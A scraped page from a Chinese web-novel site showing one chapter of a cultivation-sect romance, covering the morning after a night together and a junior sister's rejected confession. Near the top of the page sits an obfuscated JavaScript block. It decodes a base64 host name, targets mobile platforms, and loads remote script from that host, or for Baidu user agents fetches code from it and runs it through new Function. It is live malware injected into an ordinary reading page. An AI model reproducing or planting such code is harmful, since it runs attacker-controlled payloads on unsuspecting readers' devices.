98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一章

6(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

宋清眼珠转了转,感觉脖颈处压了个什么东西,腰间还被环住,有些不适。

应是还没醒,潜意识抖了抖肩。

陆许星被动醒,睁眸,入目的就是宋清赤裸的雪肤满是属于他的记号,眸底不自察地染上笑意,将怀里的人儿收紧了些。

宋清蹙眉,扭了扭身子有苏醒的意味。

终于睁眼,感受到有个人地紧紧贴着她,心跳漏了几拍,一阵怔忪后尖叫着挣脱该人的束缚。

只是腿部一扯动就疼的要死,她重重倒吸一口凉气。

陆许星闻声紧张问,“下身疼?”

昨夜一幕幕场景浮现脑海,虽说他是为了救自己,可自己已说过不要了他还是一轮接一轮,这样无耻!

宋清冷眸,“松手。”声音沙哑到自己也诧异,昨晚她喊了多久?

陆许星松开,“师姐……”

两人此刻还是裸体,宋清感受到一根滚热硬直的东西顶着自己臀部,红晕从脸颊绵延到耳根,她挪远缩进被窝,“你下去。”

陆许星乖巧躺回原位,语气可怜“师姐我累”最后那个字音被拉长,别有意味,听得宋清眼眸颤了颤又是一顿羞红。

是!事情源头是她,她知道他是为了救她才舍身……但他后来也没放开她就是他的不对了。饶是这样想宋清还是没法理直气壮吼他。

她噘嘴,心中委屈。

“昨夜就……当什么也没发生,我们……”

陆许星闻言敛了神色,坐直身子,低垂眼睫:“昨夜我且说过,是我荒唐莽撞,今日任由师姐处置。”

他一起身,宋清便看见了他雪白躯体上一些咬痕抓痕,不用多想也知道是她的所作所为,此刻又主动承认揽责,她心中混乱愧疚。

“你……我……你没错,救人心切,何来处置一说?一切都情有可原,”她声音逐渐弱小,“我没想怪你,日后我们还是我们。”你走你的阳关道,我过我的独木桥。

陆许星抬了眼,黑眸像在发光。

我,们?

我们?

是了,我们。

“是,师姐。”

陆许星赤裸着起身,捡起地上散落的衣饰,看着她的后背带笑,“我让小二给你换桶热水来,你泡一泡会舒服些。”

顾及她的身子,又道“我们再停留一天,明日再回仙门。”

***

回到仙宗,两人先去拜见傲双掌门。

“你们可有受伤?”听闻狐妖已被收服,傲双对这两个得意弟子十分满意。

“并无大碍。”

傲双笑着点头,“那便退去休息吧,这些天辛苦你们了。”

“谢师傅。”

“是。”

出了殿门,两人看见门口的郭冉都微怔。

“师姐好。”郭冉笑着打招呼,眼睛又飘到了陆许星身上。

宋清浅笑着点头,礼貌回应。

陆许星本想再与宋清说说话,回来时她对自己一副冷淡不搭理的模样,明明以前也是这样的状态,现在却叫他心口闷得慌。

谁知郭冉突然出现在殿门外,惊喜拉住他“师兄你回来了!”

陆许星看她一眼含糊应着,又扭头对上宋清转身离去冷淡的那一瞥,心好像在下坠,胀胀的。

“师兄你有没有受伤啊?”郭冉手四处摸寻有没有伤口。

“没有。”陆许星微蹙眉头后退一步,“师妹,男女有别。”

郭冉嘟着嘴停手,“是是是,有别,我不碰啦。”

“你怎么来了?”

郭冉并未察觉他的异样,“听三白师兄说你们回来了,就立马跑来等你呀。对了,打妖物太累了吧,我给你做顿饭吧师兄,这几天我手艺肯定又进步了。”

陆许星抿唇,内心犹豫,“……好。”

得到回复,郭冉雀跃着拉着陆许星走。

***

一切好似都回归平常。

陆许星依旧喜欢呆在寝房里看书,郭冉喜欢往他这跑,时不时带着她做的小点心。

那日她来,恰巧三白也在,便打趣着,“小师妹又来给许星送点心啊?”

郭冉有些不好意思吐了吐舌,“三白师兄你也在啊。”

“哼哼,打扰到你了?”

“不是不是,我只是来送吃的,三白师兄也尝尝我的手艺。”说罢就将木盒放在茶几上,转身挥手:“你们有事商谈,我就先走了。”

三白捻了块糕放嘴里,“嗯是有长进。”见人走远了,“那丫头对你的心意明人眼里都看得出啊,你这小子怎么这么迟钝?”

陆许星这才从书中抬眼,蹙了眉,“平日只是将师妹当meimei,并无其他想法,想必师妹也敬我如兄长。”

三白再次哼笑,“仙宗里如此多师兄弟,她又为何独独对你殷勤?落花无情,流水有意,得了,就聊到这吧,师兄我先走了哈哈哈。”

陆许星自此便再看不进书册了,倘若真是这样,该找师妹说个清楚了。

天空挂着朵朵霞云,落日的余晖给大地铺上一层暖色调,林间偶有鸦雀忽的展翅飞。

他猜郭冉大抵是外头与同门cao练的,那丫头还算务正事。

“郭冉吗?好像提前回寝舍了。”

“谢谢师弟。”陆许星望了圈子弟,却不见郭冉,揪了个同门师弟问。

经过妙灵阁时,偏不巧听见了同宗子弟议论的坏话。

“我看陆师兄这种家族普通的,练就如此修为,是不是偷练了巫邪之术,暗入妖道?”

“平日就看他不爽了,天天摆着张臭脸!”

“就是,还自然而然的享受着郭师妹的殷勤,郭师妹真是的,眼光怎么这么狭浅。”

陆许星脸色阴鹜地盯着凉亭内的几人,虽然他一路都是这样走过来的,即使是现在的实力,也并不期望受人拥戴,但是因他而殃及旁人,实在叫人咽不下气。

只是还未等他出手,便闻见了熟悉的声音。

“宗门里何时漏了你们的礼教,喜欢嚼舌根,这般不敬兄姊?”

“如此悠闲,想必道法有成,不如让我来试试你们的水平?”那字字铿锵、柔里藏刀的语气,可不就是仙宗的得意弟子第一人?

“宋师姐?!”几人惊恐,“师姐恕罪,我们知错了……”

“我们只是,嫉妒陆师兄……下次不会再犯了。”

宋清冷着脸,红唇轻启,“这次便算了,下次再让我碰上,我得捅到掌门那去。”

几人闻言,立马迈腿溜走:“谢师姐,我们现在就去训练。”

看着立马跑没烟的几个小子,宋清摇了摇头,年轻气盛不懂事,不曾想,一转头便对上了当事人的目光。

她怔住了,嘴唇欲合又张,“你在啊……”

“嗯,多谢师姐。”他神色淡淡,眸底却蕴着点点星光,无人知晓他平静的身躯里流淌着躁动的血液。

“不谢,告辞。”这是之后他们第一次正面相碰,总是些许尴尬的,只得讪讪告退。

“师兄,你来找我啦!”郭冉雀跃着跑出来迎接他,“真稀奇,师兄有何事要说?”

“上另一处谈谈吧。”避开了杂人,陆许星面露正经,使得郭冉也收敛了神色。

“师妹可有意中人?”

郭冉“唰”得有些脸红了,结巴道:“啊是,是有的。”

“那可是我?”不做铺垫,简洁明了。

郭冉被戳穿,惊讶着后退一步,耳根发烫:“师兄怎知?”

真是如此。陆许星轻叹,“还望师妹另寻他人,我尚不曾对师妹有过欲念,也不会是师妹的良人。今日说白,也希望师妹看开,不必再为了我花心思,我仍将你当做meimei。”

郭冉震在原地,明明她还未表明心意,师兄已经直言拒绝了。她觉得鼻子酸死了,酸的眼泪都要出来了。

“师兄真的不考虑下吗?”她用了多大的勇气装无所谓呢,看着陆许星的沉默不语,她是知道答案的,“好吧,我要心碎了,或许还是做师兄的师妹舒服些。”

她佯装俏皮的样子,“今天就不送师兄离开啦。”

看着陆许星离去的背影,她的目光也逐渐黯淡。



上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间